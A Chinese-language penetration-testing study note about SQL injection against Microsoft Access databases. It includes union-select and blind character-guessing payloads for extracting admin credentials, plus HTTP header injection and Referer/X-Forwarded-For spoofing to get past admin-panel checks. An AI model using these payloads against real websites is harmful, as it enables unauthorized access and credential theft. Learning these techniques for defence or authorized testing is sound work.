滲透學習筆記之access注入


1,access數據庫不同於其他數據庫,它是一個獨立的文件,放在網站目錄下,格式為mdb,一些網站可以爆破,如果沒有防下載代碼,可以被下載

access數據庫手工注入有2種方法

1,聯合查詢法

適用union select 連接sql語句

(1) order by 語句查字段

2,union select查詢表

union select 1,2,3,4,5... from admin 查詢admin

union select 1,username,3,4,...password,15,16 from admin

2,逐字猜解法

and exists (select * from 表名) 獲取表名

 


and exists (select 列名 from 表名) 獲取列名

 


and (select top 1 len(列名) from 表名)=5 獲取指定列名的內容長度

 


and (select top 1 asc(mid(列名,位數,1)) from 表)=97 獲取第一位內容
and (select top 1 asc(mid(列名,位數,1)) from 表)=97 獲取第二位內容

 一點點猜解內容,當工具都注不出來的時候可以用這種方法

2  http頭注入

白帽子講安全中在瀏覽器安全一篇中講瀏覽器中最主要的就是同源策略,同源防止了類似csrf這樣的漏洞,而在php中,在服務器端使用$_server函數接受請求頭的信息,如果沒有過濾,就會帶來注入,AWVS有時可以掃描出,格式是head injection ,也可以在http請求頭試下輸入參數看頁面是否會變化

有些網站在后台會設置攔截,非本地不能上后台,非本站來源不能訪問后台,這些都可以繞過

非本站可以用火狐 hackbar 插件偽造來源

也可以編輯網站HTML,修改標簽<herf=。。。> 中的地址,偽造來源

還可以用 x-for-by 插件,在php中,這個參數接受來源ip,可以偽造成同源ip,這個參數也可以注入

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM